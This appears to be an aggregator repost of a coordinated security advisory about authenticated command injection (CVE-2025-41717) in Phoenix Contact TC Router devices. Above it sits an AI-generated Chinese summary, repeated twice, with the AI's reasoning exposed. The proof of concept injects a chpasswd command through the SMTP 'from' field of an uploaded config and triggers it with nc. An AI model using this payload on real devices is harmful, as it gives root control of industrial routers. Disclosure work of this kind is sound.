CyberDanube Security Research 20260119-0 | Authenticated Command Injection in Phoenix Contact TC Router Series
嗯,用户发来了一段邮件内容,看起来是关于一个安全漏洞的公告。他让我用中文总结一下,控制在100字以内,而且不需要特定的开头。首先,我需要快速浏览邮件内容,找出关键信息。 邮件标题是“Full Disclosure”,看起来是一个安全公告列表。发件人是Thomas Weber,来自CyberDanube。日期是2026年2月3日。邮件内容详细描述了一个漏洞,涉及到Phoenix Contact的TC Router 5004T-5G EU路由器。 漏洞名称是“Authenticated Command Injection”,CVE编号是CVE-2025-41717,影响版本是1.06.18,修复版本是1.06.23。影响级别为高。漏洞允许攻击者在设备上执行任意命令,甚至以root权限运行。 还有其他受影响的产品列表,包括多个TC Router和Cloud Client型号。解决方法是安装最新固件更新,并建议限制网络访问作为临时措施。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、受影响产品、CVE编号、攻击者需要认证、执行命令的能力、修复方法和建议措施。 可能的结构:Phoenix Contact路由器系列存在认证命令注入漏洞(CVE-2025-41717),影响多个型号。攻击者可执行任意命令并获取root权限。建议更新固件并限制访问。 检查字数是否符合要求,并确保信息准确无误。 </think> Phoenix Contact TC Router系列设备存在认证命令注入漏洞(CVE-2025-41717),允许攻击者通过配置上传接口注入恶意命令并以root权限执行操作。该漏洞影响多个型号设备,建议用户更新至最新固件版本并限制设备网络访问以降低风险。 2026-2-5 04:51:6 Author: seclists.org(查看原文) 阅读量:0 收藏
嗯,用户发来了一段邮件内容,看起来是关于一个安全漏洞的公告。他让我用中文总结一下,控制在100字以内,而且不需要特定的开头。首先,我需要快速浏览邮件内容,找出关键信息。 邮件标题是“Full Disclosure”,看起来是一个安全公告列表。发件人是Thomas Weber,来自CyberDanube。日期是2026年2月3日。邮件内容详细描述了一个漏洞,涉及到Phoenix Contact的TC Router 5004T-5G EU路由器。 漏洞名称是“Authenticated Command Injection”,CVE编号是CVE-2025-41717,影响版本是1.06.18,修复版本是1.06.23。影响级别为高。漏洞允许攻击者在设备上执行任意命令,甚至以root权限运行。 还有其他受影响的产品列表,包括多个TC Router和Cloud Client型号。解决方法是安装最新固件更新,并建议限制网络访问作为临时措施。 接下来,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、受影响产品、CVE编号、攻击者需要认证、执行命令的能力、修复方法和建议措施。 可能的结构:Phoenix Contact路由器系列存在认证命令注入漏洞(CVE-2025-41717),影响多个型号。攻击者可执行任意命令并获取root权限。建议更新固件并限制访问。 检查字数是否符合要求,并确保信息准确无误。 </think> Phoenix Contact TC Router系列设备存在认证命令注入漏洞(CVE-2025-41717),允许攻击者通过配置上传接口注入恶意命令并以root权限执行操作。该漏洞影响多个型号设备,建议用户更新至最新固件版本并限制设备网络访问以降低风险。 2026-2-5 04:51:6 Author: seclists.org(查看原文) 阅读量:0 收藏
Full Disclosure mailing list archives
From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 3 Feb 2026 11:13:05 +0000
CyberDanube Security Research 20260119-0
-------------------------------------------------------------------------------
title| Authenticated Command Injection
product| TC Router 5004T-5G EU
vulnerable version| 1.06.18
fixed version| 1.06.23
CVE number| CVE-2025-41717
impact| High
homepage| https://www.phoenixcontact.com/
found| 16.04.2025
by| D. Blagojevic, S. Dietz, F. Koroknai, T. Weber
| CyberDanube Security Research
| Vienna | St. Pölten
| This research was conducted in cooperation with VERBUND
| OT Cyber Security Lab during a penetration test.
|
| https://www.cyberdanube.com
|
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"What we do
Connecting, distributing, and controlling power and data flows - we have been
developing the right products for this purpose since 1923. Whether in
industrial production facilities, in the field of renewable energies, in
infrastructure, or for complex device connections: our solutions are used
wherever processes must run automatically. Above and beyond their pure
function, they help our partners to develop sustainable applications with more
efficient processes and reduced costs.
We are Phoenix Contact: With innovative products and solutions, we are paving
the way to a climate-neutral and sustainable world."
Source: https://www.phoenixcontact.com/en-us/company
Vulnerable versions
-------------------------------------------------------------------------------
Tested on TC Router version 1.06.18
According to the vendor, the following other products are also affected:
Product Name | Affected Firmware Version
TC ROUTER 3002T-3G | < FW 3.08.8
TC ROUTER 2002T-3G | < FW 3.08.8
TC ROUTER 3002T-4G | < FW 3.08.8
TC ROUTER 3002T-4G GL| < FW 3.08.8
TC ROUTER 5004T-5G EU | < FW 1.06.23
TC ROUTER 3002T-4G VZW | < FW 3.08.8
TC ROUTER 3002T-4G ATT | < FW 3.08.8
TC ROUTER 2002T-4G | < FW 3.08.8
CLOUD CLIENT 1101TTX/TX | < FW 3.07.7
TC CLOUD CLIENT 1002-4G ATT | < FW 3.08.8
TC CLOUD CLIENT 1002-TX/TX | < FW 3.07.7
Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Code Execution (CVE-2025-41717)
The device is vulnerable to an authenticated code injection. An attacker with
valid credentials could abuse this issue to execute code as root.
Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Code Execution (CVE-2025-41717)
The config-upload endpoint can be used to inject arbitrary commands which
get executed when polling the sock_server. The malicous config changes the
root password and enables the service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<entry name="conf/smtp/auth">1</entry>
<entry name="conf/smtp/from">p () t com'$(echo "root:password1!"|ch
passwd)'</entry>
<entry name="conf/smtp/local">1</entry>
<entry name="conf/smtp/password">asdasdasd</entry>
<entry name="conf/smtp/port">25</entry>
<entry name="conf/smtp/server">192.168.19.138</entry>
[...]
<entry name="conf/alerts/sock_enable">1</entry>
<entry name="conf/alerts/sock_port">14323</entry>
<entry name="conf/alerts/sock_xml_io">0</entry>
<entry name="conf/alerts/sock_xml_nl">1</entry>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connecting to the service and sending a mail triggers the command.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ nc 192.168.19.133 14323
<?xml version="1.0"?>
<email to="pwned () pwned com">
<subject>pwned</subject>
<body>
</body>
</email>
-------------------------------------------------------------------------------
Solution
-------------------------------------------------------------------------------
Install the latest available update. See vendor advisory for detailed version
information.
Workaround
-------------------------------------------------------------------------------
Restrict network access to the device.
Recommendation
-------------------------------------------------------------------------------
Configuration file reviews are recommended before they got applied to the
device.
Contact Timeline
-------------------------------------------------------------------------------
2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the
shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all
affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-11-18: Phone call with vendor. Agreed publication date after 2026-01-13.
2026-01-19: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF T.Weber / @2026
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- CyberDanube Security Research 20260119-0 | Authenticated Command Injection in Phoenix Contact TC Router Series Thomas Weber | CyberDanube via Fulldisclosure (Feb 04)
文章来源: https://seclists.org/fulldisclosure/2026/Feb/3
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh